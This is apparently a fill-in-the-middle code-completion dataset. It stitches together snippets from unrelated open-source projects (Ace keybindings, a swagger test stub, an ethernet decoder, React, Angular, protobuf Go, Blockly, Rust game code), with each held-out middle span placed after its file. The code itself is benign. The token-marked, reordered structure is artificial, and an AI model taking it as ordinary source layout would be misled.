"toggleFindWholeWord" }, { bindKey: {mac: "Command-L", win: "Ctrl-L"}, name: "expandtoline" }, { bindKey: {mac: "Shift-Esc", win: "Shift-Esc"}, name: "removeSecondaryCursors" } ].forEach(function(binding) { var command = exports.handler.commands[binding.name]; if (command) command.bindKey = binding.bindKey; exports.handler.bindKey(binding.bindKey, command || binding.name); }); }); (function() { ace.require(["ace/keyboard/vscode"], function(m) { if (typeof module == "object" && typeof exports == "object" && module) { module.exports = m; } }); })();<|fim▁end|>
}, { bindKey: {mac: "Shift-F8|Shift-Option-F8", win: "Shift-F8|Shift-Alt-F8"},
<|file_name|>test_add_product_to_cart_request.py<|end_file_name|><|fim▁begin|># coding: utf-8 """ Server API Reference for Server API (REST/Json) OpenAPI spec version: 2.0.6 Generated by: https://github.com/swagger-api/swagger-codegen.git<|fim▁hole|>""" from __future__ import absolute_import import os import sys import unittest import kinow_client from kinow_client.rest import ApiException from kinow_client.models.add_product_to_cart_request import AddProductToCartRequest class TestAddProductToCartRequest(unittest.TestCase): """ AddProductToCartRequest unit test stubs """ def setUp(self): pass def tearDown(self): pass def testAddProductToCartRequest(self): """ Test AddProductToCartRequest """ model = kinow_client.models.add_product_to_cart_request.AddProductToCartRequest() if __name__ == '__main__': unittest.main()<|fim▁end|>
<|file_name|>ethernet.py<|end_file_name|><|fim▁begin|>#=============================================================================== # Copyright 2012 NetApp, Inc. All Rights Reserved, # contribution by Jorge Mora <[email protected]> # # This program is free software; you can redistribute it and/or modify it under # the terms of the GNU General Public License as published by the Free Software # Foundation; either version 2 of the License, or (at your option) any later # version. # # This program is distributed in the hope that it will be useful, but WITHOUT # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS # FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. #=============================================================================== """ ETHERNET module Decode ethernet layer (RFC 894) Ethernet II. """ import nfstest_config as c from baseobj import BaseObj from macaddr import MacAddr from packet.internet.ipv4 import IPv4 from packet.internet.ipv6 import IPv6 from packet.internet.arp import ARP,RARP # Module constants __author__ = "Jorge Mora (%s)" % c.NFSTEST_AUTHOR_EMAIL __copyright__ = "Copyright (C) 2012 NetApp, Inc." __license__ = "GPL v2"<|fim▁hole|>_ETHERNET_map = { 0x0800: 'IPv4', 0x86dd: 'IPv6', 0x0806: 'ARP', 0x8035: 'RARP', } class ETHERNET(BaseObj): """Ethernet object Usage: from packet.link.ethernet import ETHERNET x = ETHERNET(pktt) Object definition: ETHERNET( dst = MacAddr(), # destination MAC address src = MacAddr(), # source MAC address type = int, # payload type data = string, # raw data of payload if type is not supported ) """ # Class attributes _attrlist = ("dst", "src", "type", "data") def __init__(self, pktt): """Constructor Initialize object's private data. pktt: Packet trace object (packet.pktt.Pktt) so this layer has access to the parent layers. """ unpack = pktt.unpack ulist = unpack.unpack(14, "!6s6sH") self.dst = MacAddr(ulist[0].encode('hex')) self.src = MacAddr(ulist[1].encode('hex')) self.type = ulist[2] pktt.pkt.ethernet = self if self.type == 0x0800: # Decode IPv4 packet IPv4(pktt) elif self.type == 0x86dd: # Decode IPv6 packet IPv6(pktt) elif self.type == 0x0806: # Decode ARP packet ARP(pktt) elif self.type == 0x8035: # Decode RARP packet RARP(pktt) else: self.data = unpack.getbytes() def __str__(self): """String representation of object The representation depends on the verbose level set by debug_repr(). If set to 0 the generic object representation is returned. If set to 1 the representation of the object is condensed: '00:0c:29:54:09:ef -> 60:33:4b:29:6e:9d ' If set to 2 the representation of the object also includes the type of payload: '00:0c:29:54:09:ef -> 60:33:4b:29:6e:9d, type: 0x800(IPv4)' """ rdebug = self.debug_repr() if rdebug == 1: out = "%s -> %s " % (self.src, self.dst) elif rdebug == 2: etype = _ETHERNET_map.get(self.type, None) etype = hex(self.type) if etype is None else "%s(%s)" % (hex(self.type), etype) out = "%s -> %s, type: %s" % (self.src, self.dst, etype) else: out = BaseObj.__str__(self) return out<|fim▁end|>
__version__ = "1.1"
<|file_name|>Drawer.component.tsx<|end_file_name|><|fim▁begin|>import React from 'react'; import { Disclosure, DisclosureContent, useDisclosureState } from 'reakit'; import { ButtonComponentType } from '../Button'; import * as S from './Drawer.style'; import { ButtonProps } from '../Button/Button'; export type DrawerProps = { toggleButton?: React.ReactElement<ButtonProps, ButtonComponentType>; heading?: React.ReactNodeArray | React.ReactNode; footer?: React.ReactNodeArray | React.ReactNode; visible: boolean; children: React.ReactNode | React.ReactNodeArray; }; export const Drawer = React.forwardRef( ({ toggleButton, heading, children, footer, visible, ...props }: DrawerProps, ref) => { const state = useDisclosureState({ animated: true, visible }); const { setVisible } = state; React.useEffect(() => { setVisible(visible); }, [setVisible, visible]); return ( <> {toggleButton && ( <Disclosure {...state}> {disclosureProps => React.cloneElement(toggleButton, disclosureProps)} </Disclosure> )} {state.visible && ( <DisclosureContent {...state} {...props} as={S.Drawer} ref={ref}> {heading && <S.DrawerHeading>{heading}</S.DrawerHeading>} <S.DrawerBody>{children}</S.DrawerBody> {footer && <S.DrawerFooter>{footer}</S.DrawerFooter>} </DisclosureContent> )} </> );<|fim▁hole|> export default Drawer;<|fim▁end|>
}, );
<|file_name|>glproc.py<|end_file_name|><|fim▁begin|>########################################################################## # # Copyright 2010 VMware, Inc. # All Rights Reserved. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # ##########################################################################/ """Generated an header, glproc.hpp, which does pretty much what GLEW does, but covers all the functions we support. """ import specs.stdapi as stdapi from dispatch import Dispatcher from specs.glapi import glapi from specs.glxapi import glxapi from specs.wglapi import wglapi from specs.cglapi import cglapi from specs.eglapi import eglapi from specs.glesapi import glesapi # See http://www.opengl.org/registry/ABI/ public_symbols = set([ # GL 1.2 and ARB_multitexture "glAccum", "glAlphaFunc", "glAreTexturesResident", "glArrayElement", "glBegin", "glBindTexture", "glBitmap", "glBlendFunc", "glCallList", "glCallLists", "glClear", "glClearAccum", "glClearColor", "glClearDepth", "glClearIndex", "glClearStencil", "glClipPlane", "glColor3b", "glColor3bv", "glColor3d", "glColor3dv", "glColor3f", "glColor3fv", "glColor3i", "glColor3iv", "glColor3s", "glColor3sv", "glColor3ub", "glColor3ubv", "glColor3ui", "glColor3uiv", "glColor3us", "glColor3usv", "glColor4b", "glColor4bv", "glColor4d",<|fim▁hole|> "glColor4dv", "glColor4f", "glColor4fv", "glColor4i", "glColor4iv", "glColor4s", "glColor4sv", "glColor4ub", "glColor4ubv", "glColor4ui", "glColor4uiv", "glColor4us", "glColor4usv", "glColorMask", "glColorMaterial", "glColorPointer", "glCopyPixels", "glCopyTexImage1D", "glCopyTexImage2D", "glCopyTexSubImage1D", "glCopyTexSubImage2D", "glCullFace", "glDeleteLists", "glDeleteTextures", "glDepthFunc", "glDepthMask", "glDepthRange", "glDisable", "glDisableClientState", "glDrawArrays", "glDrawBuffer", "glDrawElements", "glDrawPixels", "glEdgeFlag", "glEdgeFlagPointer", "glEdgeFlagv", "glEnable", "glEnableClientState", "glEnd", "glEndList", "glEvalCoord1d", "glEvalCoord1dv", "glEvalCoord1f", "glEvalCoord1fv", "glEvalCoord2d", "glEvalCoord2dv", "glEvalCoord2f", "glEvalCoord2fv", "glEvalMesh1", "glEvalMesh2", "glEvalPoint1", "glEvalPoint2", "glFeedbackBuffer", "glFinish", "glFlush", "glFogf", "glFogfv", "glFogi", "glFogiv", "glFrontFace", "glFrustum", "glGenLists", "glGenTextures", "glGetBooleanv", "glGetClipPlane", "glGetDoublev", "glGetError", "glGetFloatv", "glGetIntegerv", "glGetLightfv", "glGetLightiv", "glGetMapdv", "glGetMapfv", "glGetMapiv", "glGetMaterialfv", "glGetMaterialiv", "glGetPixelMapfv", "glGetPixelMapuiv", "glGetPixelMapusv", "glGetPointerv", "glGetPolygonStipple", "glGetString", "glGetTexEnvfv", "glGetTexEnviv", "glGetTexGendv", "glGetTexGenfv", "glGetTexGeniv", "glGetTexImage", "glGetTexLevelParameterfv", "glGetTexLevelParameteriv", "glGetTexParameterfv", "glGetTexParameteriv", "glHint", "glIndexMask", "glIndexPointer", "glIndexd", "glIndexdv", "glIndexf", "glIndexfv", "glIndexi", "glIndexiv", "glIndexs", "glIndexsv", "glIndexub", "glIndexubv", "glInitNames", "glInterleavedArrays", "glIsEnabled", "glIsList", "glIsTexture", "glLightModelf", "glLightModelfv", "glLightModeli", "glLightModeliv", "glLightf", "glLightfv", "glLighti", "glLightiv", "glLineStipple", "glLineWidth", "glListBase", "glLoadIdentity", "glLoadMatrixd", "glLoadMatrixf", "glLoadName", "glLogicOp", "glMap1d", "glMap1f", "glMap2d", "glMap2f", "glMapGrid1d", "glMapGrid1f", "glMapGrid2d", "glMapGrid2f", "glMaterialf", "glMaterialfv", "glMateriali", "glMaterialiv", "glMatrixMode", "glMultMatrixd", "glMultMatrixf", "glNewList", "glNormal3b", "glNormal3bv", "glNormal3d", "glNormal3dv", "glNormal3f", "glNormal3fv", "glNormal3i", "glNormal3iv", "glNormal3s", "glNormal3sv", "glNormalPointer", "glOrtho", "glPassThrough", "glPixelMapfv", "glPixelMapuiv", "glPixelMapusv", "glPixelStoref", "glPixelStorei", "glPixelTransferf", "glPixelTransferi", "glPixelZoom", "glPointSize", "glPolygonMode", "glPolygonOffset", "glPolygonStipple", "glPopAttrib", "glPopClientAttrib", "glPopMatrix", "glPopName", "glPrioritizeTextures", "glPushAttrib", "glPushClientAttrib", "glPushMatrix", "glPushName", "glRasterPos2d", "glRasterPos2dv", "glRasterPos2f", "glRasterPos2fv", "glRasterPos2i", "glRasterPos2iv", "glRasterPos2s", "glRasterPos2sv", "glRasterPos3d", "glRasterPos3dv", "glRasterPos3f", "glRasterPos3fv", "glRasterPos3i", "glRasterPos3iv", "glRasterPos3s", "glRasterPos3sv", "glRasterPos4d", "glRasterPos4dv", "glRasterPos4f", "glRasterPos4fv", "glRasterPos4i", "glRasterPos4iv", "glRasterPos4s", "glRasterPos4sv", "glReadBuffer", "glReadPixels", "glRectd", "glRectdv", "glRectf", "glRectfv", "glRecti", "glRectiv", "glRects", "glRectsv", "glRenderMode", "glRotated", "glRotatef", "glScaled", "glScalef", "glScissor", "glSelectBuffer", "glShadeModel", "glStencilFunc", "glStencilMask", "glStencilOp", "glTexCoord1d", "glTexCoord1dv", "glTexCoord1f", "glTexCoord1fv", "glTexCoord1i", "glTexCoord1iv", "glTexCoord1s", "glTexCoord1sv", "glTexCoord2d", "glTexCoord2dv", "glTexCoord2f", "glTexCoord2fv", "glTexCoord2i", "glTexCoord2iv", "glTexCoord2s", "glTexCoord2sv", "glTexCoord3d", "glTexCoord3dv", "glTexCoord3f", "glTexCoord3fv", "glTexCoord3i", "glTexCoord3iv", "glTexCoord3s", "glTexCoord3sv", "glTexCoord4d", "glTexCoord4dv", "glTexCoord4f", "glTexCoord4fv", "glTexCoord4i", "glTexCoord4iv", "glTexCoord4s", "glTexCoord4sv", "glTexCoordPointer", "glTexEnvf", "glTexEnvfv", "glTexEnvi", "glTexEnviv", "glTexGend", "glTexGendv", "glTexGenf", "glTexGenfv", "glTexGeni", "glTexGeniv", "glTexImage1D", "glTexImage2D", "glTexParameterf", "glTexParameterfv", "glTexParameteri", "glTexParameteriv", "glTexSubImage1D", "glTexSubImage2D", "glTranslated", "glTranslatef", "glVertex2d", "glVertex2dv", "glVertex2f", "glVertex2fv", "glVertex2i", "glVertex2iv", "glVertex2s", "glVertex2sv", "glVertex3d", "glVertex3dv", "glVertex3f", "glVertex3fv", "glVertex3i", "glVertex3iv", "glVertex3s", "glVertex3sv", "glVertex4d", "glVertex4dv", "glVertex4f", "glVertex4fv", "glVertex4i", "glVertex4iv", "glVertex4s", "glVertex4sv", "glVertexPointer", "glViewport", # GLX 1.3 and GLX_ARB_get_proc_address "glXChooseVisual", "glXCreateContext", "glXDestroyContext", "glXMakeCurrent", "glXCopyContext", "glXSwapBuffers", "glXCreateGLXPixmap", "glXDestroyGLXPixmap", "glXQueryExtension", "glXQueryVersion", "glXIsDirect", "glXGetConfig", "glXGetCurrentContext", "glXGetCurrentDrawable", "glXWaitGL", "glXWaitX", "glXUseXFont", "glXQueryExtensionsString", "glXQueryServerString", "glXGetClientString", "glXGetCurrentDisplay", "glXChooseFBConfig", "glXGetFBConfigAttrib", "glXGetFBConfigs", "glXGetVisualFromFBConfig", "glXCreateWindow", "glXDestroyWindow", "glXCreatePixmap", "glXDestroyPixmap", "glXCreatePbuffer", "glXDestroyPbuffer", "glXQueryDrawable", "glXCreateNewContext", "glXMakeContextCurrent", "glXGetCurrentReadDrawable", "glXQueryContext", "glXSelectEvent", "glXGetSelectedEvent", "glXGetProcAddressARB", "glXGetProcAddress", # WGL #"glDebugEntry", "wglChoosePixelFormat", "wglCopyContext", "wglCreateContext", "wglCreateLayerContext", "wglDeleteContext", "wglDescribeLayerPlane", "wglDescribePixelFormat", "wglGetCurrentContext", "wglGetCurrentDC", "wglGetDefaultProcAddress", "wglGetLayerPaletteEntries", "wglGetPixelFormat", "wglGetProcAddress", "wglMakeCurrent", "wglRealizeLayerPalette", "wglSetLayerPaletteEntries", "wglSetPixelFormat", "wglShareLists", "wglSwapBuffers", "wglSwapLayerBuffers", "wglSwapMultipleBuffers", "wglUseFontBitmapsA", "wglUseFontBitmapsW", "wglUseFontOutlinesA", "wglUseFontOutlinesW", ]) # EGL 1.4 public_symbols.update([ "eglBindAPI", "eglBindTexImage", "eglChooseConfig", "eglCopyBuffers", "eglCreateContext", "eglCreatePbufferFromClientBuffer", "eglCreatePbufferSurface", "eglCreatePixmapSurface", "eglCreateWindowSurface", "eglDestroyContext", "eglDestroySurface", "eglGetConfigAttrib", "eglGetConfigs", "eglGetCurrentContext", "eglGetCurrentDisplay", "eglGetCurrentSurface", "eglGetDisplay", "eglGetError", "eglGetProcAddress", "eglInitialize", "eglMakeCurrent", "eglQueryAPI", "eglQueryContext", "eglQueryString", "eglQuerySurface", "eglReleaseTexImage", "eglReleaseThread", "eglSurfaceAttrib", "eglSwapBuffers", "eglSwapInterval", "eglTerminate", "eglWaitClient", "eglWaitGL", "eglWaitNative", ]) class GlDispatcher(Dispatcher): def header(self): print ''' #if defined(_WIN32) extern HINSTANCE __libGlHandle; #else extern void * __libGlHandle; #endif void * __getPublicProcAddress(const char *procName); void * __getPrivateProcAddress(const char *procName); ''' def is_public_function(self, function): return function.name in public_symbols or function.name.startswith('CGL') if __name__ == '__main__': print print '#ifndef _GLPROC_HPP_' print '#define _GLPROC_HPP_' print print '#include "glimports.hpp"' print '#include "os.hpp"' print print dispatcher = GlDispatcher() dispatcher.header() print '#if defined(TRACE_EGL)' print dispatcher.dispatch_api(eglapi) print '#elif defined(_WIN32)' print dispatcher.dispatch_api(wglapi) print '#elif defined(__APPLE__)' dispatcher.dispatch_api(cglapi) print '#else' print dispatcher.dispatch_api(glxapi) print '#endif' print dispatcher.dispatch_api(glapi) print dispatcher.dispatch_api(glesapi) print print '#endif /* !_GLPROC_HPP_ */' print<|fim▁end|>
<|file_name|>configuration-inspector-chart-manager-container.component.ts<|end_file_name|><|fim▁begin|>import { Component, OnInit } from '@angular/core'; import { Subject } from 'rxjs'; import { takeUntil } from 'rxjs/operators'; import { Actions } from 'app/shared/store'; import { StoreHelperService } from 'app/shared/services'; import { InspectorChartListDataService, SOURCE_TYPE } from '../inspector-chart-list/inspector-chart-list-data.service'; @Component({ selector: 'pp-configuration-inspector-chart-manager-container', templateUrl: './configuration-inspector-chart-manager-container.component.html', styleUrls: ['./configuration-inspector-chart-manager-container.component.css'] }) export class ConfigurationInspectorChartManagerContainerComponent implements OnInit { private unsubscribe: Subject<null> = new Subject(); constructor( private storeHelperService: StoreHelperService, private inspectorChartListDataService: InspectorChartListDataService<|fim▁hole|> ngOnInit() { this.inspectorChartListDataService.getChartLayoutInfo(SOURCE_TYPE.APPLICATION_INSPECTOR).pipe( takeUntil(this.unsubscribe) ).subscribe((applicationData: {[key: string]: IChartLayoutInfo[]}) => { this.storeHelperService.dispatch(new Actions.UpdateApplicationInspectorChartLayout(applicationData)); }, (error: IServerErrorFormat) => { this.storeHelperService.dispatch(new Actions.UpdateApplicationInspectorChartLayout({ applicationInspectorChart: [] })); }); this.inspectorChartListDataService.getChartLayoutInfo(SOURCE_TYPE.AGENT_INSPECTOR).pipe( takeUntil(this.unsubscribe) ).subscribe((agentData: {[key: string]: IChartLayoutInfo[]}) => { this.storeHelperService.dispatch(new Actions.UpdateAgentInspectorChartLayout(agentData)); }, (error: IServerErrorFormat) => { this.storeHelperService.dispatch(new Actions.UpdateAgentInspectorChartLayout({ applicationInspectorChart: [] })); }); } }<|fim▁end|>
) {}
<|file_name|>uuid.pb.go<|end_file_name|><|fim▁begin|>// Code generated by protoc-gen-gogo. // source: uuid.proto // DO NOT EDIT! package events import proto "github.com/gogo/protobuf/proto" import math "math" // discarding unused import gogoproto "github.com/gogo/protobuf/gogoproto/gogo.pb" import io "io" import fmt "fmt" import github_com_gogo_protobuf_proto "github.com/gogo/protobuf/proto" // Reference imports to suppress errors if they are not otherwise used. var _ = proto.Marshal var _ = math.Inf // / Type representing a 128-bit UUID. // // The bytes of the UUID should be packed in little-endian **byte** (not bit) order. For example, the UUID `f47ac10b-58cc-4372-a567-0e02b2c3d479` should be encoded as `UUID{ low: 0x7243cc580bc17af4, high: 0x79d4c3b2020e67a5 }` type UUID struct { Low *uint64 `protobuf:"varint,1,req,name=low" json:"low,omitempty"` High *uint64 `protobuf:"varint,2,req,name=high" json:"high,omitempty"` XXX_unrecognized []byte `json:"-"` } func (m *UUID) Reset() { *m = UUID{} } func (m *UUID) String() string { return proto.CompactTextString(m) } func (*UUID) ProtoMessage() {} func (m *UUID) GetLow() uint64 { if m != nil && m.Low != nil { return *m.Low } return 0 } func (m *UUID) GetHigh() uint64 { if m != nil && m.High != nil { return *m.High } return 0 } func init() { } func (m *UUID) Unmarshal(data []byte) error { var hasFields [1]uint64 l := len(data) iNdEx := 0 for iNdEx < l { var wire uint64 for shift := uint(0); ; shift += 7 { if iNdEx >= l { return io.ErrUnexpectedEOF } b := data[iNdEx] iNdEx++<|fim▁hole|> } } fieldNum := int32(wire >> 3) wireType := int(wire & 0x7) switch fieldNum { case 1: if wireType != 0 { return fmt.Errorf("proto: wrong wireType = %d for field Low", wireType) } var v uint64 for shift := uint(0); ; shift += 7 { if iNdEx >= l { return io.ErrUnexpectedEOF } b := data[iNdEx] iNdEx++ v |= (uint64(b) & 0x7F) << shift if b < 0x80 { break } } m.Low = &v hasFields[0] |= uint64(0x00000001) case 2: if wireType != 0 { return fmt.Errorf("proto: wrong wireType = %d for field High", wireType) } var v uint64 for shift := uint(0); ; shift += 7 { if iNdEx >= l { return io.ErrUnexpectedEOF } b := data[iNdEx] iNdEx++ v |= (uint64(b) & 0x7F) << shift if b < 0x80 { break } } m.High = &v hasFields[0] |= uint64(0x00000002) default: var sizeOfWire int for { sizeOfWire++ wire >>= 7 if wire == 0 { break } } iNdEx -= sizeOfWire skippy, err := skipUuid(data[iNdEx:]) if err != nil { return err } if (iNdEx + skippy) > l { return io.ErrUnexpectedEOF } m.XXX_unrecognized = append(m.XXX_unrecognized, data[iNdEx:iNdEx+skippy]...) iNdEx += skippy } } if hasFields[0]&uint64(0x00000001) == 0 { return github_com_gogo_protobuf_proto.NewRequiredNotSetError("low") } if hasFields[0]&uint64(0x00000002) == 0 { return github_com_gogo_protobuf_proto.NewRequiredNotSetError("high") } return nil } func skipUuid(data []byte) (n int, err error) { l := len(data) iNdEx := 0 for iNdEx < l { var wire uint64 for shift := uint(0); ; shift += 7 { if iNdEx >= l { return 0, io.ErrUnexpectedEOF } b := data[iNdEx] iNdEx++ wire |= (uint64(b) & 0x7F) << shift if b < 0x80 { break } } wireType := int(wire & 0x7) switch wireType { case 0: for { if iNdEx >= l { return 0, io.ErrUnexpectedEOF } iNdEx++ if data[iNdEx-1] < 0x80 { break } } return iNdEx, nil case 1: iNdEx += 8 return iNdEx, nil case 2: var length int for shift := uint(0); ; shift += 7 { if iNdEx >= l { return 0, io.ErrUnexpectedEOF } b := data[iNdEx] iNdEx++ length |= (int(b) & 0x7F) << shift if b < 0x80 { break } } iNdEx += length return iNdEx, nil case 3: for { var wire uint64 var start int = iNdEx for shift := uint(0); ; shift += 7 { if iNdEx >= l { return 0, io.ErrUnexpectedEOF } b := data[iNdEx] iNdEx++ wire |= (uint64(b) & 0x7F) << shift if b < 0x80 { break } } wireType := int(wire & 0x7) if wireType == 4 { break } next, err := skipUuid(data[start:]) if err != nil { return 0, err } iNdEx = start + next } return iNdEx, nil case 4: return iNdEx, nil case 5: iNdEx += 4 return iNdEx, nil default: return 0, fmt.Errorf("proto: illegal wireType %d", wireType) } } panic("unreachable") } func (m *UUID) Size() (n int) { var l int _ = l if m.Low != nil { n += 1 + sovUuid(uint64(*m.Low)) } if m.High != nil { n += 1 + sovUuid(uint64(*m.High)) } if m.XXX_unrecognized != nil { n += len(m.XXX_unrecognized) } return n } func sovUuid(x uint64) (n int) { for { n++ x >>= 7 if x == 0 { break } } return n } func sozUuid(x uint64) (n int) { return sovUuid(uint64((x << 1) ^ uint64((int64(x) >> 63)))) } func (m *UUID) Marshal() (data []byte, err error) { size := m.Size() data = make([]byte, size) n, err := m.MarshalTo(data) if err != nil { return nil, err } return data[:n], nil } func (m *UUID) MarshalTo(data []byte) (n int, err error) { var i int _ = i var l int _ = l if m.Low == nil { return 0, github_com_gogo_protobuf_proto.NewRequiredNotSetError("low") } else { data[i] = 0x8 i++ i = encodeVarintUuid(data, i, uint64(*m.Low)) } if m.High == nil { return 0, github_com_gogo_protobuf_proto.NewRequiredNotSetError("high") } else { data[i] = 0x10 i++ i = encodeVarintUuid(data, i, uint64(*m.High)) } if m.XXX_unrecognized != nil { i += copy(data[i:], m.XXX_unrecognized) } return i, nil } func encodeFixed64Uuid(data []byte, offset int, v uint64) int { data[offset] = uint8(v) data[offset+1] = uint8(v >> 8) data[offset+2] = uint8(v >> 16) data[offset+3] = uint8(v >> 24) data[offset+4] = uint8(v >> 32) data[offset+5] = uint8(v >> 40) data[offset+6] = uint8(v >> 48) data[offset+7] = uint8(v >> 56) return offset + 8 } func encodeFixed32Uuid(data []byte, offset int, v uint32) int { data[offset] = uint8(v) data[offset+1] = uint8(v >> 8) data[offset+2] = uint8(v >> 16) data[offset+3] = uint8(v >> 24) return offset + 4 } func encodeVarintUuid(data []byte, offset int, v uint64) int { for v >= 1<<7 { data[offset] = uint8(v&0x7f | 0x80) v >>= 7 offset++ } data[offset] = uint8(v) return offset + 1 }<|fim▁end|>
wire |= (uint64(b) & 0x7F) << shift if b < 0x80 { break
<|file_name|>mod.rs<|end_file_name|><|fim▁begin|>// Copyright (c) The Diem Core Contributors<|fim▁hole|><|fim▁end|>
// SPDX-License-Identifier: Apache-2.0 pub mod mock_vm_validator;
<|file_name|>field_checkbox.js<|end_file_name|><|fim▁begin|>/** * @license * Copyright 2012 Google LLC * SPDX-License-Identifier: Apache-2.0 */ /** * @fileoverview Checkbox field. Checked or not checked. * @author [email protected] (Neil Fraser) */ 'use strict'; goog.provide('Blockly.FieldCheckbox'); /** @suppress {extraRequire} */ goog.require('Blockly.Events.BlockChange'); goog.require('Blockly.Field'); goog.require('Blockly.fieldRegistry'); goog.require('Blockly.utils.dom'); goog.require('Blockly.utils.object'); /** * Class for a checkbox field. * @param {string|boolean=} opt_value The initial value of the field. Should * either be 'TRUE', 'FALSE' or a boolean. Defaults to 'FALSE'. * @param {Function=} opt_validator A function that is called to validate * changes to the field's value. Takes in a value ('TRUE' or 'FALSE') & * returns a validated value ('TRUE' or 'FALSE'), or null to abort the * change. * @param {Object=} opt_config A map of options used to configure the field. * See the [field creation documentation]{@link https://developers.google.com/blockly/guides/create-custom-blocks/fields/built-in-fields/checkbox#creation} * for a list of properties this parameter supports. * @extends {Blockly.Field} * @constructor */ Blockly.FieldCheckbox = function(opt_value, opt_validator, opt_config) { /** * Character for the check mark. Used to apply a different check mark * character to individual fields. * @type {?string} * @private */ this.checkChar_ = null; Blockly.FieldCheckbox.superClass_.constructor.call( this, opt_value, opt_validator, opt_config); }; Blockly.utils.object.inherits(Blockly.FieldCheckbox, Blockly.Field); /** * The default value for this field. * @type {*} * @protected */ Blockly.FieldCheckbox.prototype.DEFAULT_VALUE = false; /** * Construct a FieldCheckbox from a JSON arg object. * @param {!Object} options A JSON object with options (checked). * @return {!Blockly.FieldCheckbox} The new field instance. * @package * @nocollapse */ Blockly.FieldCheckbox.fromJson = function(options) { return new Blockly.FieldCheckbox(options['checked'], undefined, options); }; /** * Default character for the checkmark. * @type {string} * @const */ Blockly.FieldCheckbox.CHECK_CHAR = '\u2713'; /** * Serializable fields are saved by the XML renderer, non-serializable fields * are not. Editable fields should also be serializable. * @type {boolean} */ Blockly.FieldCheckbox.prototype.SERIALIZABLE = true; /** * Mouse cursor style when over the hotspot that initiates editability. */ Blockly.FieldCheckbox.prototype.CURSOR = 'default'; /** * Configure the field based on the given map of options. * @param {!Object} config A map of options to configure the field based on. * @protected * @override */ Blockly.FieldCheckbox.prototype.configure_ = function(config) { Blockly.FieldCheckbox.superClass_.configure_.call(this, config); if (config['checkCharacter']) { this.checkChar_ = config['checkCharacter']; } }; /** * Create the block UI for this checkbox. * @package */ Blockly.FieldCheckbox.prototype.initView = function() { Blockly.FieldCheckbox.superClass_.initView.call(this); Blockly.utils.dom.addClass( /** @type {!SVGTextElement} **/ (this.textElement_), 'blocklyCheckbox'); this.textElement_.style.display = this.value_ ? 'block' : 'none'; }; /** * @override */ Blockly.FieldCheckbox.prototype.render_ = function() { if (this.textContent_) { this.textContent_.nodeValue = this.getDisplayText_(); } this.updateSize_(this.getConstants().FIELD_CHECKBOX_X_OFFSET); }; /** * @override */ Blockly.FieldCheckbox.prototype.getDisplayText_ = function() { return this.checkChar_ || Blockly.FieldCheckbox.CHECK_CHAR; }; /** * Set the character used for the check mark. * @param {?string} character The character to use for the check mark, or * null to use the default. */ Blockly.FieldCheckbox.prototype.setCheckCharacter = function(character) { this.checkChar_ = character; this.forceRerender(); }; /** * Toggle the state of the checkbox on click. * @protected */ Blockly.FieldCheckbox.prototype.showEditor_ = function() { this.setValue(!this.value_); }; /** * Ensure that the input value is valid ('TRUE' or 'FALSE'). * @param {*=} opt_newValue The input value. * @return {?string} A valid value ('TRUE' or 'FALSE), or null if invalid. * @protected */ Blockly.FieldCheckbox.prototype.doClassValidation_ = function(opt_newValue) { if (opt_newValue === true || opt_newValue === 'TRUE') { return 'TRUE'; } if (opt_newValue === false || opt_newValue === 'FALSE') { return 'FALSE'; } return null; }; /** * Update the value of the field, and update the checkElement. * @param {*} newValue The value to be saved. The default validator guarantees * that this is a either 'TRUE' or 'FALSE'. * @protected */<|fim▁hole|>Blockly.FieldCheckbox.prototype.doValueUpdate_ = function(newValue) { this.value_ = this.convertValueToBool_(newValue); // Update visual. if (this.textElement_) { this.textElement_.style.display = this.value_ ? 'block' : 'none'; } }; /** * Get the value of this field, either 'TRUE' or 'FALSE'. * @return {string} The value of this field. */ Blockly.FieldCheckbox.prototype.getValue = function() { return this.value_ ? 'TRUE' : 'FALSE'; }; /** * Get the boolean value of this field. * @return {boolean} The boolean value of this field. */ Blockly.FieldCheckbox.prototype.getValueBoolean = function() { return /** @type {boolean} */ (this.value_); }; /** * Get the text of this field. Used when the block is collapsed. * @return {string} Text representing the value of this field * ('true' or 'false'). */ Blockly.FieldCheckbox.prototype.getText = function() { return String(this.convertValueToBool_(this.value_)); }; /** * Convert a value into a pure boolean. * * Converts 'TRUE' to true and 'FALSE' to false correctly, everything else * is cast to a boolean. * @param {*} value The value to convert. * @return {boolean} The converted value. * @private */ Blockly.FieldCheckbox.prototype.convertValueToBool_ = function(value) { if (typeof value == 'string') { return value == 'TRUE'; } else { return !!value; } }; Blockly.fieldRegistry.register('field_checkbox', Blockly.FieldCheckbox);<|fim▁end|>
<|file_name|>set_mana.rs<|end_file_name|><|fim▁begin|>use rune_vm::Rune; use rustc_serialize::json; use game_state::GameState; use minion_card::UID; use hlua; #[derive(RustcDecodable, RustcEncodable, Clone, Debug)] pub struct SetMana { controller_uid: UID, mana: u8, } implement_for_lua!(SetMana, |mut _metatable| {}); impl SetMana { pub fn new(controller_uid: UID, mana: u8) -> SetMana {<|fim▁hole|> controller_uid: controller_uid, mana: mana, } } pub fn to_rune(&self) -> Box<Rune> { Box::new(self.clone()) } } impl Rune for SetMana { fn execute_rune(&self, game_state: &mut GameState) { game_state.get_mut_controller_by_uid(self.controller_uid).unwrap().set_mana(self.mana); } fn can_see(&self, _controller: UID, _game_state: &GameState) -> bool { return true; } fn to_json(&self) -> String { json::encode(self).unwrap().replace("{", "{\"runeType\":\"SetMana\",") } fn into_box(&self) -> Box<Rune> { Box::new(self.clone()) } }<|fim▁end|>
SetMana {
